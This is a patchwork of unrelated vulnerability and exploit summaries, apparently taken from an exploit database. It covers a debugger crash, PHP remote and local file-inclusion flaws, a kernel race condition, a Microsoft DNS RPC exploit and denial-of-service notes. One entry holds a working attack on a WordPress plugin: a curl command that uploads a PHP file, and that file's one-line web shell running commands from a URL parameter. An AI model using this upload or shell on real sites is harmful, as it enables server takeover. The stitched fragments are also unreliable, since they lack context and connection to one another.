The vulnerability exists in Immunity Debugger v1.85. It is caused by incorrect path/file extension parsing. By creating a folder with the name .exe.exe and placing any program inside, or by trying to debug an executable with the name test.exe.exe or lib.exe.dll, it is possible to trigger a crash. This is due to the 'OpenEXEfile' function not checking if the return value of strchr() is zero.
This vulnerability allows remote attackers to include arbitrary files via a specially crafted URL.
+---------------------------------------------------------------------------+#[+] Author: TUNISIAN CYBER#[+] Title: WP Plugin Free ACF Frontend Display File Upload Vulnerability#[+] Date: 3-07-2015#[+] Type: WebAPP#[+] Download Plugin: https://downloads.wordpress.org/plugin/acf-frontend-display.2.0.5.zip#[+] Tested on: KaliLinux#[+] Friendly Sites: sec4ever.com#[+] Twitter: @TCYB3R+---------------------------------------------------------------------------+curl -k -X POST -F "action=upload" -F "files=@/root/Desktop/evil.php" "site:wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php"File Path: site/wp-content/uploads/uigen_YEAR/file.phpExample: site/wp-content/uploads/uigen_2015/evil.phpevil.php: <?php passthru($_GET['cmd']); ?>TUNISIAN CYBER(miutex)-S4E
This exploit targets a race condition vulnerability in proc_kmem_dump.c. By leveraging the race condition, an attacker can gain unauthorized access to memory locations and potentially execute arbitrary code.
The vulnerability allows an attacker to include remote files by manipulating the 'GALLERY_BASEDIR' parameter in the 'business_functions.php' and 'ui_functions.php' scripts. This can lead to remote code execution and unauthorized access to sensitive information.
An attacker can exploit this issue to force the affected application to become unresponsive, denying service to legitimate users.
The vulnerability allows remote attackers to include arbitrary files via the 'abs_path' parameter in the 'index.php' and 'checkout.php' scripts. This can lead to remote code execution and unauthorized access to sensitive information.
The vulnerability allows an attacker to include local files by manipulating the 'dsn[phptype]' parameter in the 'soustab.php' script. The attacker can specify the path of the file to be included, resulting in unauthorized access to sensitive information.
The exploit targets the Microsoft Dns Server and allows for local and remote RPC exploitation. It features OS fingerprinting, supports Windows 2000 server and Windows 2003 server, and includes universal local exploits for Win2k and Win2k3. The exploit uses the Microsoft RPC API.
An attacker can exploit this issue to cause an affected application to crash, denying service to legitimate users which may aid in other attacks.